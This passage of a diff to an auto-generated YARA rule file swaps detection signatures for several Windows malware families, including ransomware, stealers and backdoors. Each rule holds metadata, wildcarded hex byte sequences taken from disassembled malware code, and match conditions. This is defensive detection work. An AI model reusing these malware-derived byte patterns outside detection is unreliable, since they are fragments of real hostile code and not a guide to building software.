-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wslink_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cur1_downloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cur1_downloader_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "043911efcdbe30576afee29cea013b6adde98869fbb9875f474aa30d6ea1369e"
+		logic_hash = "1c569e94280f8095f5f07b5abf340e9688b7e484a4ea176f880968651b21cc46"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114565,34 +114749,34 @@ rule MALPEDIA_Win_Wslink_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4885db 7409 48ffcb c6040300 75f7 488907 4885c0 }
-		$sequence_1 = { e8???????? 482be0 498bf9 498bd8 488bf2 488be9 4d85c0 }
-		$sequence_2 = { 8bd7 488bc8 e8???????? 4885c0 0f8467010000 3b7b0c 7f05 }
-		$sequence_3 = { e8???????? 85c0 7476 4d8bcf 4c8bc6 498bd6 488bcb }
-		$sequence_4 = { e8???????? 4c8b4308 4d85c0 7412 488d1571ac0900 448bcd 488bce }
-		$sequence_5 = { c705????????03000000 ff15???????? 488b0d???????? ff15???????? 48891d???????? 488b0d???????? 488d15fa070e00 }
-		$sequence_6 = { 41ff5248 eb27 ba8c000000 4c8d0d32660800 b906000000 448d420a c74424206c000000 }
-		$sequence_7 = { ffc1 48ffc0 3bca 7cf2 eb11 488d7001 448be5 }
-		$sequence_8 = { 7420 ffc3 3bde 7c95 4c8bac24a0000000 448be5 eb19 }
-		$sequence_9 = { ff4f30 488bcb e8???????? 488b7c2460 488bc3 488b5c2470 4883c468 }
+		$sequence_0 = { c684241204000061 c684241304000070 c684241404000073 c684241504000068 c68424160400006f c684241704000074 }
+		$sequence_1 = { 88040a 4863442408 488b4c2430 0fb654240c }
+		$sequence_2 = { 488364243000 4889442428 4c89742420 e8???????? 4c8b442468 4c8d0d5d4effff 498b5008 }
+		$sequence_3 = { 4863442430 488bd0 488b4c2478 e8???????? 48634c2420 0fb600 88440c24 }
+		$sequence_4 = { 488bcb e8???????? 8bf8 e9???????? 41be00010000 4c8d3d57360100 }
+		$sequence_5 = { e8???????? 488d1527ff0100 488d4c2420 e8???????? cc 48895c2410 }
+		$sequence_6 = { 8b8c2468010000 e8???????? 4889442430 c744242040000000 488d442420 4889442428 4c8b442428 }
+		$sequence_7 = { c3 e8???????? 90 cc 33c0 4c8d1d7b44ffff 884118 }
+		$sequence_8 = { 486bc901 8b0408 39442470 7402 eb37 8b442440 }
+		$sequence_9 = { c684245f03000069 c68424600300006f c68424610300006e c684246203000049 c684246303000064 }
 
 	condition:
-		7 of them and filesize < 2007040
+		7 of them and filesize < 402432
 }
-rule MALPEDIA_Win_Ramnit_Auto : FILE
+rule MALPEDIA_Win_Virlock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2d07274e-4e7e-51f1-9043-6e669a2900ab"
+		id = "9f47c27a-c9f5-5a88-9d0b-7ae966c8318a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ramnit_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.virlock_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "ac5af9c4c79d490a7e08824dfdc4e94d8423d8a8e8b47eb3783c3aa2be0c55ae"
+		logic_hash = "57885374cad55b220d8ca1f9432224bf7f5758a9b4619824c3d2cad7d03a8a3d"
 		score = 75
-		quality = 73
+		quality = 71
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -114604,32 +114788,32 @@ rule MALPEDIA_Win_Ramnit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5a 5b c9 c20400 55 8bec }
-		$sequence_1 = { 5e 5f 59 5a }
-		$sequence_2 = { 51 52 8b4508 8b5d0c 4b f7d3 23c3 }
-		$sequence_3 = { 51 52 8b4508 8b5d0c }
-		$sequence_4 = { 8b7510 3b7514 7705 3b7d0c 7602 }
-		$sequence_5 = { b800000000 59 5f 5e 5a 5b c9 }
-		$sequence_6 = { 7434 837d1000 742e 837d1400 7428 }
-		$sequence_7 = { 8bec 8b4508 3b450c 7603 8b450c c9 c20800 }
-		$sequence_8 = { f7d0 48 59 5f }
-		$sequence_9 = { 7512 47 46 e2f6 b801000000 59 }
+		$sequence_0 = { 81f234ea98fc ba77fa04fa bb5191b6fe e8???????? 81f2fcfd84fd bb9d77e800 81f32dcee8ff }
+		$sequence_1 = { 41 4a 54 52 4a 4b 55 }
+		$sequence_2 = { 68???????? eb0a 68???????? 68???????? e8???????? 83fa00 751b }
+		$sequence_3 = { 49 52 43 52 58 }
+		$sequence_4 = { 3b12 3646 9a19386f50123e 54 0ae7 0220 6f }
+		$sequence_5 = { d0c3 4a 43 d0a90a2bd0f3 }
+		$sequence_6 = { bb666d87fd 83e904 ba0dd2b2fe eb00 83f905 7d74 bb93ec7eff }
+		$sequence_7 = { 6b484768 e4cc 681cafc880 cf 6a78 d6 49 }
+		$sequence_8 = { 70c1 8a6a8f b3f0 46 fd 098f46182e59 53 }
+		$sequence_9 = { 36a25c6a5eac 42 775c 44 e4f2 2b470c d04ba2 }
 
 	condition:
-		7 of them and filesize < 470016
+		7 of them and filesize < 4202496
 }
-rule MALPEDIA_Win_Forest_Tiger_Auto : FILE
+rule MALPEDIA_Win_Common_Magic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c5055f82-5e25-5cec-b6f9-75913bef33b5"
+		id = "01685495-e500-52ed-8d28-52ffda64d4ce"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.forest_tiger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.forest_tiger_auto.yar#L1-L149"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.common_magic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.common_magic_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "398de9d2907c8260eaacbe3112d8affc7b628942665baa833cce575671a0ed06"
+		logic_hash = "f088c9c6d83029098f6560147761ea146208530ef1a48657d7b10a76113354f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114643,37 +114827,32 @@ rule MALPEDIA_Win_Forest_Tiger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 833f01 0f94c0 84c0 7407 e8???????? }
-		$sequence_1 = { 6bc930 8975e0 8db1c0084400 8975e4 }
-		$sequence_2 = { 6aff 8d8df4fdffff 51 52 }
-		$sequence_3 = { 4c2be6 8bc3 c1e810 41880424 }
-		$sequence_4 = { 4c2be6 8bc3 c1e808 41880424 4c2be6 8bc3 }
-		$sequence_5 = { 6aff 8d942498010000 6880000000 52 }
-		$sequence_6 = { 6aff ff15???????? 894604 85c0 7429 }
-		$sequence_7 = { 6bc009 0fb68408c0724300 6a08 c1e804 }
-		$sequence_8 = { 4c2be6 4a8d7c27ff 4c8d6601 4c8bc7 }
-		$sequence_9 = { 4c2be6 418bc7 c1e808 41880424 4c2be6 418bc7 c1e810 }
-		$sequence_10 = { 4c2be6 c1eb18 41881c24 4c2be6 }
-		$sequence_11 = { 6bc00c 56 ff90f0664300 59 }
-		$sequence_12 = { 4c2be6 45883c24 4c2be6 418bc7 }
-		$sequence_13 = { 6aff 8d8c2478010000 6880000000 51 e8???????? 83c410 b8???????? }
-		$sequence_14 = { 4c2be7 4c8b4340 48b90000000000000080 0fb7d0 }
+		$sequence_0 = { 83e805 7415 83e801 0f8595010000 c745e488424100 e9???????? }
+		$sequence_1 = { 83c008 5d c3 8b04c5240e4100 5d c3 8bff }
+		$sequence_2 = { 83c408 83f908 7235 8b955cffffff 8d0c4d02000000 8bc2 }
+		$sequence_3 = { c70000000000 33c9 c7401000000000 c7401400000000 0f1085acfdffff }
+		$sequence_4 = { e8???????? 8b0f 83c408 85c9 7454 8b5704 }
+		$sequence_5 = { 66891448 53 ff15???????? 8bc6 8b4df4 64890d00000000 59 }
+		$sequence_6 = { 8934b8 8bc7 83e03f 6bc838 8b049570804100 }
+		$sequence_7 = { 8d3400 8985bcfdffff 56 8d85e8fdffff 50 8d85acfdffff 50 }
+		$sequence_8 = { 660f1f840000000000 83bd40ffffff08 8d8d2cffffff 8bf7 0f438d2cffffff 837f1408 }
+		$sequence_9 = { 8d45b4 c745b45368656c 50 56 c745b86c457865 c745bc63757465 }
 
 	condition:
-		7 of them and filesize < 709632
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Rcs_Auto : FILE
+rule MALPEDIA_Win_Httpbrowser_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5cb7f68d-21c9-5599-a702-4f54a0b6f0b5"
+		id = "adff80ab-eb6c-5a3c-b157-43b2baed9ae7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rcs_auto.yar#L1-L180"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.httpbrowser_auto.yar#L1-L173"
 		license_url = "N/A"
-		logic_hash = "bb528f6bd9f82e58eb70b918c0975f8fb2e7c478b0eed2addcdb6f608a2b172e"
+		logic_hash = "00c38478a4fbc51d8b9ca5fb24e8846e76e8f61512ecf76046dde9dd700684fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114687,40 +114866,38 @@ rule MALPEDIA_Win_Rcs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 5f 5e 5d 5b 33c0 }
-		$sequence_1 = { 89442456 8944245a 8944245e 89442462 89442466 8944246a }
-		$sequence_2 = { 85ff 0f84d4000000 57 e8???????? }
-		$sequence_3 = { e8???????? 83c430 6aff 68???????? }
-		$sequence_4 = { 40 68???????? 50 e8???????? 83c40c eb0d }
-		$sequence_5 = { 6a01 6a00 6a05 6800000040 }
-		$sequence_6 = { 81f1ff2fe523 85cd f9 33d9 }
-		$sequence_7 = { 83e001 48 83e004 83c004 }
-		$sequence_8 = { 6a6e ff5760 8bb7dc000000 898610120000 5f 5e c9 }
-		$sequence_9 = { 3b5d0c 7506 8b7d08 897dfc 8b7d08 89fe }
-		$sequence_10 = { c78578fffbff06000000 c7857cfffbff00000100 c78588fffbff00028004 8365ec00 8d8518fffbff }
-		$sequence_11 = { 0508070000 50 ff96b8000000 43 83fb0f 72dd }
-		$sequence_12 = { 81f20c055354 66f7c54b45 f5 6681fca14f }
-		$sequence_13 = { 83fb01 741d 83fb02 7418 83fb03 7413 }
-		$sequence_14 = { 740c c785a0f9fbff00e0ffff eb0a c785a0f9fbff80faffff ffb5a0f9fbff }
-		$sequence_15 = { ffb5a0f9fbff 8b86dc000000 8b5020 8b805c020000 }
-		$sequence_16 = { 8b7d08 8b37 81c608020000 56 ff75fc ff5704 894764 }
-		$sequence_17 = { 83fb01 750e 8b463c 8d5640 }
+		$sequence_0 = { 56 8d85fcedffff 6a00 50 e8???????? 53 }
+		$sequence_1 = { a3???????? 3bfe 7459 68???????? 68???????? e8???????? 59 }
+		$sequence_2 = { 75f9 6a00 2bc1 8d4dfc 51 }
+		$sequence_3 = { e8???????? 83c40c ff15???????? 8985ecfeffff }
+		$sequence_4 = { 6a00 50 e8???????? 83c418 8d856853ffff 50 }
+		$sequence_5 = { ffb538eeffff ff15???????? 85c0 744a 53 53 ffb52ceeffff }
+		$sequence_6 = { 33c9 41 6a06 66898de8fdffff }
+		$sequence_7 = { 56 ff15???????? 8985e0fbffff 3bc6 7428 56 56 }
+		$sequence_8 = { 33d2 b9ff010000 33c0 8dbd5af2ffff }
+		$sequence_9 = { 8b55fc 8a92704d4100 0890a1524100 40 3bc7 76f5 41 }
+		$sequence_10 = { 5d 8a4c15b8 884dec 8b45ec }
+		$sequence_11 = { 5d 5d 9d 5d 8b4510 }
+		$sequence_12 = { 50 ff15???????? 83c410 68???????? 55 8bec 9c }
+		$sequence_13 = { 5d 8d9544f3ffff 8d854453ffff 52 }
+		$sequence_14 = { 58 b900020000 33c0 8dbdf8f7ffff f3ab 50 50 }
+		$sequence_15 = { 57 83f9ff 7414 8bf9 c1ff05 83e11f 8b3cbd00644100 }
 
 	condition:
-		7 of them and filesize < 11501568
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Backconfig_Auto : FILE
+rule MALPEDIA_Win_Lightwork_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "18fd149c-ad9b-5433-8651-ac1dcd92de05"
+		id = "5b31d092-dcc8-5a1c-ab90-287cfb331c0c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backconfig"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.backconfig_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightwork"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lightwork_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "dc29e43fa81d60d5f53e6f4d5e158937c417e8f12650929b20d71338a8cb5ead"
+		logic_hash = "27c40b18d2800b0d83c68dd39a56494e6158b954f55a7dafaeb8933b3fe805f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114734,32 +114911,32 @@ rule MALPEDIA_Win_Backconfig_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff }
-		$sequence_1 = { e8???????? 8b4de4 83c40c 6bc930 8975e0 8db1682a4100 }
-		$sequence_2 = { 8a15???????? 8d8569ffffff 6a00 50 898d64ffffff 889568ffffff }
-		$sequence_3 = { c1f805 8d1485c0504100 8b0a 83e61f c1e606 03ce }
-		$sequence_4 = { 8bc3 c1f805 8d3c85c0504100 8bf3 83e61f c1e606 8b07 }
-		$sequence_5 = { 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff 898df4feffff }
-		$sequence_6 = { 8d8d2cfdffff 68???????? 51 e8???????? 83c414 68401f0000 }
-		$sequence_7 = { 6a00 50 898d64ffffff 889568ffffff e8???????? }
-		$sequence_8 = { 8bf1 83e61f 8d3c85c0504100 8b07 c1e606 f644300401 7436 }
-		$sequence_9 = { 8bec 8b4508 56 8d34c550224100 833e00 7513 }
+		$sequence_0 = { 885003 90 5d c3 55 89e5 8b4508 }
+		$sequence_1 = { 8b4014 83f801 7e25 8b4508 8b00 8d90ff000000 }
+		$sequence_2 = { 55 89e5 8b4508 8b4004 83c001 0fb610 8b4508 }
+		$sequence_3 = { 8b4508 0fb6400d 8845f7 8b4508 0fb6400c 84c0 740a }
+		$sequence_4 = { 8855e4 8845e0 837d0800 750f c7042410000000 e8???????? 894508 }
+		$sequence_5 = { 01d0 8b4008 39450c 7f04 c645f701 }
+		$sequence_6 = { 891424 e8???????? 83451802 8b4508 8d500f 8b4518 8944240c }
+		$sequence_7 = { 8b00 8b4014 83c00b 8945f0 }
+		$sequence_8 = { 01d0 6bd03c 8b4508 8b00 01d0 2d00fd4b02 8b5dfc }
+		$sequence_9 = { 8065fffc 8b450c 0045ff 8b4508 0fb655ff 8810 }
 
 	condition:
-		7 of them and filesize < 217088
+		7 of them and filesize < 1132544
 }
-rule MALPEDIA_Win_Mars_Stealer_Auto : FILE
+rule MALPEDIA_Win_Smarteyes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "89d493f9-e4b1-533f-82c2-eb346efb826d"
+		id = "8c7fb874-a11f-5f55-9cef-395ee0219165"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mars_stealer_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.smarteyes_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "fa77ecd9a121fc69a9c627c8a10e5db8b46b11ecb902d48795d692c6a136b780"
+		logic_hash = "c5287c273b80d8410483f16228152973a803d8ac51015792b4ca7695eb66f818"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114773,32 +114950,32 @@ rule MALPEDIA_Win_Mars_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894508 8b4d08 8b550c 8a02 8801 }
-		$sequence_1 = { 51 e8???????? 83c418 8d95b0fdffff }
-		$sequence_2 = { 83c404 8b4df0 c7414800000000 8b55f0 837a3c00 7416 }
-		$sequence_3 = { 8d8598faffff 50 e8???????? 83c418 8b4d1c 51 }
-		$sequence_4 = { c705????????ac304100 68???????? e8???????? 83c404 a3???????? 68???????? e8???????? }
-		$sequence_5 = { 55 8bec c705????????ac304100 c705????????c4304100 c705????????d4304100 c705????????e4304100 }
-		$sequence_6 = { 8b551c 52 e8???????? 83c410 6a04 8d45f8 50 }
-		$sequence_7 = { 68???????? 8b0d???????? 51 ff15???????? 8b95e4fcffff 52 ff15???????? }
-		$sequence_8 = { 8d8d78ecffff 51 e8???????? 8d95e4d7ffff 52 8d85e0d7ffff 50 }
-		$sequence_9 = { 8bec b8c81f0000 e8???????? c745f0a01f0000 c745ec00000000 c78544e0ffff9e304100 }
+		$sequence_0 = { 3bf0 7303 8975f8 53 bb04040000 53 e8???????? }
+		$sequence_1 = { 53 50 e8???????? 59 59 85c0 750d }
+		$sequence_2 = { 56 e8???????? 8bc6 c1f805 8b0485c0f50210 83e61f c1e606 }
+		$sequence_3 = { f785c400000000800000 7407 68???????? eb1c 80bdc600000001 750e 66837d8009 }
+		$sequence_4 = { 8d85a0010000 50 8d4584 56 50 e8???????? 8d85bc030000 }
+		$sequence_5 = { 8b4508 53 56 85c0 0f84f5000000 66833800 0f84eb000000 }
+		$sequence_6 = { b800000004 e9???????? 85c0 7504 84d2 74ee 8bc3 }
+		$sequence_7 = { 85c0 7525 8d442418 50 8d442420 50 ff15???????? }
+		$sequence_8 = { e8???????? 85c0 0f8465010000 8d85c8faffff 8d5001 8a08 }
+		$sequence_9 = { c6041800 8b45f0 eb02 33c0 5e c9 c3 }
 
 	condition:
-		7 of them and filesize < 219136
+		7 of them and filesize < 429056
 }
-rule MALPEDIA_Win_Ratel_Auto : FILE
+rule MALPEDIA_Win_Unidentified_113_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7eb1cf1a-9399-50f9-a3fb-9725ac6a1e01"
+		id = "fca9d6d2-018c-5238-a2c5-d26ca95c2862"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ratel_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_113"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_113_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d4d80b213dd2387d65ee9b24a5f750334253f3a710c3a54d1bb71b146d82d823"
+		logic_hash = "55ef739d0acd0e849dcf600673496f5aa2583f128c784d3cf7a14a872f001ae1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114812,32 +114989,32 @@ rule MALPEDIA_Win_Ratel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8944240c 8b4584 c744240800000000 89442404 8d45b2 890424 e8???????? }
-		$sequence_1 = { 31ff 8db42600000000 6690 0fb701 89fd 83e902 89c7 }
-		$sequence_2 = { 8b4508 31db 66891e 8b7508 8b00 8b50f4 }
-		$sequence_3 = { 08d0 0f8474060000 c745c800000000 be10000000 c645cc00 8b4d08 8b4108 }
-		$sequence_4 = { 8b4c2454 89442418 8d842418010000 89442414 8b842480010000 896c2404 89442410 }
-		$sequence_5 = { e9???????? 8d4510 8d4d08 bf10000000 890424 8945d0 e8???????? }
-		$sequence_6 = { 8b03 8b5508 837d1401 8d0450 0f84b4000000 8b5514 8b7510 }
-		$sequence_7 = { f7d1 0fafc7 39c1 0f92c1 084dc3 8b4d08 01d0 }
-		$sequence_8 = { 8d8584feffff c7442408ffffffff 8d8d74ffffff c744240408000000 890424 e8???????? 83ec0c }
-		$sequence_9 = { 8b4524 8b55b8 83ec08 8b4db4 8955a0 8b00 3b4da4 }
+		$sequence_0 = { ff7604 6894000000 ff74246c e8???????? 83c410 8946f8 e9???????? }
+		$sequence_1 = { ffb424c8000000 56 53 e8???????? 8bbc24d4000000 83c42c 8bc7 }
+		$sequence_2 = { ff742430 68???????? e8???????? 8bf0 83c40c 85f6 0f845f020000 }
+		$sequence_3 = { ff761c ffd0 0f57c0 83c408 660f13442410 8b6c2414 8b5c2410 }
+		$sequence_4 = { ff2485eca50810 8b4104 85c0 0f842c010000 8b38 33c9 85ff }
+		$sequence_5 = { e8???????? 83c404 83cbff e9???????? 83ff37 0f85b4000000 389ac7010000 }
+		$sequence_6 = { e8???????? 8bf0 83c408 85f6 0f84bf000000 a1???????? 6a00 }
+		$sequence_7 = { e9???????? 807df000 0f845bffffff ff75e4 e8???????? 59 e9???????? }
+		$sequence_8 = { ff742468 8bf0 57 ff7310 ff742430 e8???????? 50 }
+		$sequence_9 = { ff7608 ff15???????? 894628 85c0 752d ff15???????? 6860c00000 }
 
 	condition:
-		7 of them and filesize < 2174976
+		7 of them and filesize < 4707328
 }
-rule MALPEDIA_Win_Clop_Auto : FILE
+rule MALPEDIA_Win_Grabbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d1ccc182-0c15-5d56-97cc-8d7a704e7207"
+		id = "6b177866-b328-5532-b1df-c68c15ec705b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.clop_auto.yar#L1-L193"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grabbot_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "3750789377624c88727401f0639208a90e22f423fdcc34c5c702f455dce2beef"
+		logic_hash = "c94d3ff4eb131743923dc6cd096207359254fdb038801b45a5051cbbd0d7bf96"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114851,42 +115028,38 @@ rule MALPEDIA_Win_Clop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 6860070000 6a40 ff15???????? }
-		$sequence_1 = { 6a04 6800300000 6887000000 6a00 }
-		$sequence_2 = { 53 ff15???????? 50 ff15???????? 56 53 8bf8 }
-		$sequence_3 = { 6a00 ff15???????? 68???????? 8bd8 }
-		$sequence_4 = { 8bf8 ff15???????? 8bf0 56 6a40 }
-		$sequence_5 = { 75be ddd8 db2d???????? b802000000 833d????????00 0f85f0080000 }
-		$sequence_6 = { 0f842e0c0000 83ec08 0fae5c2404 8b442404 }
-		$sequence_7 = { 50 ff15???????? 83c40c 6860070000 }
-		$sequence_8 = { 8d85bcefffff 50 ff15???????? 68???????? }
-		$sequence_9 = { 68???????? 68???????? e8???????? 83c424 6aff }
-		$sequence_10 = { 68???????? 50 ffd3 8d85d4f7ffff 50 }
-		$sequence_11 = { ffd0 c3 8bff 55 8bec 83ec1c 8d4de4 }
-		$sequence_12 = { e8???????? 8be5 5d c20400 56 ff15???????? 6a00 }
-		$sequence_13 = { 0f85aa010000 68???????? 8d442450 50 }
-		$sequence_14 = { ff15???????? 68???????? 8d85dcf7ffff 50 }
-		$sequence_15 = { 6a00 6a00 e8???????? 83c408 6aff ff15???????? 33c0 }
-		$sequence_16 = { 6aff ffd7 8b4dfc 33c0 5f }
-		$sequence_17 = { 83c40c 33f6 85ff 7428 }
-		$sequence_18 = { 83c424 53 50 ffd6 }
-		$sequence_19 = { 6a00 56 ffd7 8b35???????? 6800800000 }
+		$sequence_0 = { 0fb702 83f85a 770b 83f841 7206 83c020 }
+		$sequence_1 = { 7206 83c020 0fb7c0 83c202 }
+		$sequence_2 = { 770d 83f841 7208 83c020 }
+		$sequence_3 = { 83eb14 83c314 837b0c00 7455 8b430c 034540 }
+		$sequence_4 = { c745ac6f6d4173 c745b06369697a c645b400 c745b84c647247 c745bc65745072 c745c06f636564 }
+		$sequence_5 = { 85c9 7460 83bc188400000005 7656 8bbc18b4000000 }
+		$sequence_6 = { e8???????? 59 81c480000000 50 8bf1 e8???????? e8???????? }
+		$sequence_7 = { 51 53 52 684b49a851 }
+		$sequence_8 = { 56 ffd0 33c9 66894c37fe }
+		$sequence_9 = { 8b0d???????? 894804 8b0d???????? 894808 8b0d???????? 89480c e9???????? }
+		$sequence_10 = { 89480c e9???????? 33c0 e9???????? }
+		$sequence_11 = { 7428 8b0d???????? 8908 8b0d???????? 894804 8b0d???????? }
+		$sequence_12 = { 57 8d7c000c 57 e8???????? }
+		$sequence_13 = { 8bf0 85f6 741d 8d4601 }
+		$sequence_14 = { e8???????? 85c0 56 0f9fc3 e8???????? 83c414 }
+		$sequence_15 = { 741e 57 56 6aff }
 
 	condition:
-		7 of them and filesize < 796672
+		7 of them and filesize < 1335296
 }
-rule MALPEDIA_Win_Cerber_Auto : FILE
+rule MALPEDIA_Win_Shadowhammer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8ad318b2-fd4e-5d92-a12e-9e1971af4667"
+		id = "b57d4c23-f9b4-522a-89ba-c4ac79dc31ec"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cerber_auto.yar#L1-L103"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shadowhammer_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "ae8e4dedfae2653bfc99d378ae78948f80a8248c771063fd5aaf09788296968e"
+		logic_hash = "9c0187702056fafb079efbd5dab5b93b10eb6c78f6f641de1a14fc5c3fa972f5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114900,30 +115073,32 @@ rule MALPEDIA_Win_Cerber_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff36 ff15???????? 899e14010000 eb06 }
-		$sequence_1 = { 85c9 7435 8b550c 8d3c8a 8b4d08 2bca 894df4 }
-		$sequence_2 = { 8b7d10 eb04 83248b00 85c9 }
-		$sequence_3 = { 85c0 7427 52 e8???????? 59 85c0 }
-		$sequence_4 = { 7c28 8bc1 3bc1 7522 8b8cc3f03b0000 }
-		$sequence_5 = { 3b8374010000 7e06 898374010000 ff7510 50 53 e8???????? }
-		$sequence_6 = { d3ee 85c9 7414 ff7514 51 ff7508 }
-		$sequence_7 = { 8b5d08 8bc3 c1e002 50 ff750c e8???????? }
+		$sequence_0 = { 8945fc ff5624 83c40c 53 }
+		$sequence_1 = { 6a08 57 ff741da4 ff16 8945f0 }
+		$sequence_2 = { 8dbd01feffff ab ab ab ab }
